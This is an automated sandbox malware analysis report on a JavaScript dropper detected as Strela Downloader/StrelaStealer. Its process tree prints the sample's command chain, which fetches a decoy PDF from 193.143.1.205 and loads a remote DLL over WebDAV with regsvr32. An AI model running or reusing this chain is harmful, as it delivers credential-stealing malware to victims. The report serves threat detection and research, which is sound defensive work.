Windows
Analysis Report
2598020871582219525.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7484 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\25980 2087158221 9525.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7536 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\366 67172724.d ll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7544 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7588 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 7780 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7996 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 8180 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 08 --field -trial-han dle=1544,i ,149831840 0420949271 7,68111790 8557086047 4,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 8060 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1589064 |
Start date and time: | 2025-01-11 09:04:16 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 54s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 16 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 2598020871582219525.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 52.22.41.97, 52.6.155.20, 3.219.243.226, 3.233.129.217, 2.16.168.105, 2.16.168.107, 162.159.61.3, 172.64.41.3, 184.28.90.27, 2.22.50.131, 2.22.50.144, 23.209.209.135, 95.101.148.135, 23.200.0.33, 23.200.0.21, 192.168.2.4, 4.175.87.197, 13.107.246.45
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- VT rate limit hit for: 2598020871582219525.js
Time | Type | Description |
---|---|---|
03:05:10 | API Interceptor | |
03:05:15 | API Interceptor | |
03:05:15 | API Interceptor | |
03:05:27 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 1.3073544887040098 |
Encrypted: | false |
SSDEEP: | 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrs:KooCEYhgYEL0In |
MD5: | 098C08C1E5AD7E8B17A101B447B4B06E |
SHA1: | 36BBC0724805E4045BA92AA3A1D4766F8A0682F4 |
SHA-256: | 8DD2A4B44DBCBEED9264CEBC46EC72C8D0D814C46565F4D29CB4D9F8DAB7C930 |
SHA-512: | D38D2EB183A5B1D373AC3DACC85E78E8FC0A238392D132E0C431FE97D55CFD2640E7CD7C3E7764A4489EF0269C90E7A0E8D5120B07CF384444A094E7C3B2714C |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.4221253450236424 |
Encrypted: | false |
SSDEEP: | 1536:BSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Baza/vMUM2Uvz7DO |
MD5: | 3200CC53D3AAF0670157679A55C2F5FA |
SHA1: | B0B1F3A6041C511B5502B1C94FE3CA3ECD10CE3A |
